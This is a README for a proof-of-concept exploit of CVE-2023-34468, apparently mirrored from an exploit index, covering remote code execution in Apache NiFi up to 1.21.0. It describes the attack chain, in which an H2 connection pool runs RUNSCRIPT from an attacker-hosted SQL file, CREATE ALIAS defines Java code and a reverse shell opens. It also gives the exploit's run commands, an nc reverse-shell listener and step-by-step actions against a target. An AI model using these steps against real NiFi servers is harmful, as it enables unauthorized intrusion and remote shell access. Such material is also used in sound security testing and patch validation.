Share
## https://sploitus.com/exploit?id=03188001-D548-5BEF-A035-F0334403C8CE
# CVE-2023-34468 โ€” Apache NiFi 1.21.0 RCE PoC

Remote Code Execution via H2 Database RUNSCRIPT in Apache NiFi <= 1.21.0

---

## Vulnerability

Apache NiFi ships with an H2 database JAR bundled by default. The `DBCPConnectionPool`
controller service can be configured to use this H2 driver. H2 supports a `RUNSCRIPT`
statement that fetches and executes a SQL file from a remote URL. That SQL file can define
arbitrary Java code via `CREATE ALIAS` and execute it on the server OS.

**Attack chain:**
```
DBCPConnectionPool (H2 driver)
    โ†’ ExecuteSQL processor
        โ†’ RUNSCRIPT FROM http://attacker/rce.sql
            โ†’ CREATE ALIAS (Java method)
                โ†’ CALL SHELLEXEC (reverse shell)
```

---

## Affected Versions

| Software     | Version       |
|-------------|---------------|
| Apache NiFi | <= 1.21.0     |
| Fixed in    | 1.21.1+       |
| Java        | Any (bundled) |

---

## Requirements

- Python 3.x
- `requests` library โ†’ `pip install requests`
- NiFi target with anonymous write access OR valid credentials
- Network access from target to your machine (for reverse shell callback)

---

## Usage

```bash
python3 poc.py --target http://NiFi.target.com \
               --lhost 10.10.10.10 \
               --lport 4444 \
               --http-port 80 \
               --cleanup
```

### Arguments

| Argument     | Default                   | Description                        |
|--------------|---------------------------|------------------------------------|
| `--target`   | http://NiFi.target.com    | Target NiFi base URL               |
| `--lhost`    | 10.10.10.10               | Your IP (tun0)                     |
| `--lport`    | 4444                      | Reverse shell listener port        |
| `--http-port`| 80                        | Port to serve rce.sql              |
| `--cleanup`  | False                     | Delete created artifacts after run |

---

## Setup

**Terminal 1 โ€” listener:**
```bash
nc -lvnp 4444
```

**Terminal 2 โ€” exploit:**
```bash
python3 poc.py --target http://NiFi.target.com --lhost 10.10.10.10 --lport 4444 --cleanup
```

---

## What the PoC Does

```
Step 1  Check anonymous access and write permissions
Step 2  Get root Process Group ID
Step 3  Create malicious DBCPConnectionPool controller service
Step 4  Enable the controller service (handles revision versioning)
Step 5  Create ExecuteSQL processor pointing to rce.sql on our HTTP server
Step 6  Start the processor โ†’ NiFi fetches rce.sql โ†’ shell callback
Step 7  Cleanup (if --cleanup flag is set)
```